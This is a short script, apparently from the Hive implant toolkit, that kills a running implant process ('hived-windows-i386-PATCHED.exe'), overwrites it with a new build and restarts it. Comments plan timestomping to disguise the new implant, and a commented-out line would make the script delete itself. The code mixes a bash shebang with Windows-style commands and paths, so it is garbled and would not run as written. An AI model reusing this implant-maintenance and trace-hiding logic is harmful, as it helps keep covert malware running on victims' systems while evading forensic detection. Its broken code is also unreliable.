#!/bin/bash
fileToDelete=$0

#Most logic required to replace and restart hive...

#  Note that we still need to implement the touch
#      Would be best to used the oldImplants time to touch newhive and
#      then use newhive's time to touch the newImplant file just before 
#      it is ran. 

#killall hived-linux-i386-PATCHED 2>/dev/null
#kill -9 `ps -ef | grep [h]ived-linux-i386-PATCHED | grep -v grep | awk '{print $2}' ` 2>/dev/null
ps -k hived-windows-i386-PATCHED.exe
sleep 5
delete  c:\\hived-windows-i386-PATCHED.exe 2>/dev/null
sleep 5
copy -f c:\\newhive c:\\hived-windows-i386-PATCHED.exe 2>/dev/null
sleep 5
start/b c:\\runningHive/hived-windows-i386-PATCHED.exe & 
sleep 5

#Remove newImplant file if it exists
#rm -f /home/miker/runningHive/newhive 2>/dev/null 

#rm -f $fileToDelete 2>/dev/null

